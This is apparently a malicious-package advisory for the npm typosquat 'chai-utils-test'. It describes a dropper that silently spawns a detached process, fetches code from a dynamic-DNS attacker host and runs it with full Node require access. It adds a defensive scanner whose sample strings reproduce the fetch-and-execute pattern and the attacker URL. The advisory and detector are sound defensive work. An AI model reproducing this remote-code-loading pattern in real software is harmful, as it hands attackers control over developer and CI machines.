MAL-2026-5748
Malicious code in chai-utils-test (npm)
Details
## Source: amazon-inspector (64edd573a9e5fdef8dcde78f5b0c9fa00521f232b886be838104741d1e0535f7)

Package name 'chai-utils-test' impersonates the popular 'chai' assertion library and ships a cloned chai source tree. The declared main (index.js) calls a top-level launcher that spawns `node lib/chai/utils/assertion.js` as a detached child process with `stdio:'ignore'` and `child.unref()`, so the dropper survives the parent and produces no visible output.

The child uses axios to GET https://statecheck.ddns.net/api/scanner.js (a dynamic-DNS host) with a base64-encoded `key=YWRtaW46c2VjcmV0MTIz` query parameter (likely a server-side gate for staged payload delivery), then runs the response body via `new Function('require', s)(require)` — granting the attacker-served code full Node `require()` access. The package also pre-installs a `global.atob` polyfill backed by `Buffer.from(x,'base64').toString('utf8')` in preparation for the fetched payload.

Net effect: any developer or CI job that requires/imports this package executes attacker-controlled code from a mutable remote endpoint with full Node privileges.
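A defensive check for the behaviour described above, as an added example that is not part of the advisory or of the package's code: it flags the described traits in JavaScript source text and finds installed copies of the package in a parsed `package-lock.json`. The regexes are assumptions about how the described calls appear in source, and the sample strings and lockfile (including `some-plugin` and `demo-app`) are constructed.

```javascript
// Added example, not code from the advisory. Regexes are assumptions about how the
// described behaviour looks in source; the package name and host come from the page.
const PACKAGE = 'chai-utils-test';
const INDICATORS = [
  // child process detached from the parent with all stdio discarded
  { id: 'detached-silent-spawn', re: /detached\s*:\s*true[^}]*stdio\s*:\s*['"]ignore['"]|stdio\s*:\s*['"]ignore['"][^}]*detached\s*:\s*true/ },
  { id: 'child-unref', re: /\.unref\s*\(\s*\)/ },
  // text compiled with the Function constructor and handed require()
  { id: 'function-ctor-with-require', re: /new\s+Function\s*\(\s*['"]require['"]/ },
  { id: 'global-atob-polyfill', re: /global\.atob\s*=/ },
  { id: 'advisory-host', re: /statecheck\.ddns\.net/i },
];

// Return the ids of every indicator present in one file's source text.
function scanSource(src) {
  return INDICATORS.filter(({ re }) => re.test(src)).map(({ id }) => id);
}

// Find every installed copy of the package in a parsed package-lock.json
// (lockfileVersion 2 or 3, where installs are keyed by node_modules path).
function lockfileHits(lock, name = PACKAGE) {
  return Object.entries(lock.packages || {})
    .filter(([path]) => path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`))
    .map(([path, meta]) => ({ path, version: meta.version }));
}

// Constructed sample inputs: fragments shaped like the description, not the real files.
const SAMPLE_LAUNCHER = "const child = spawn('node', [script], { detached: true, stdio: 'ignore' });\nchild.unref();";
const SAMPLE_STAGE = "global.atob = polyfill;\nget('https://statecheck.ddns.net/api/scanner.js');\nnew Function('require', s)(require);";
const SAMPLE_BENIGN = "const { expect } = require('chai');\nexpect(1).to.equal(1);";
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/chai': { version: '4.5.0' },
    'node_modules/some-plugin/node_modules/chai-utils-test': { version: '4.5.3' },
  },
};

console.log(scanSource(SAMPLE_LAUNCHER));
console.log(scanSource(SAMPLE_STAGE));
console.log(scanSource(SAMPLE_BENIGN));
console.log(lockfileHits(SAMPLE_LOCK));
```

The lockfile check also catches transitive installs nested under another dependency, which a look at the top-level `package.json` would miss.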
Affected packages
No fixed version published yet for chai-utils-test (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/chai-utils-test/v/4.5.5 [PACKAGE]
- https://www.npmjs.com/package/chai-utils-test/v/4.5.3 [PACKAGE]
- https://www.npmjs.com/package/chai-utils-test/v/4.5.2 [PACKAGE]
- https://www.npmjs.com/package/chai-utils-test/v/4.5.0 [PACKAGE]
- https://www.npmjs.com/package/chai-utils-test/v/4.5.4 [PACKAGE]
- https://www.npmjs.com/package/chai-utils-test/v/4.5.1 [PACKAGE]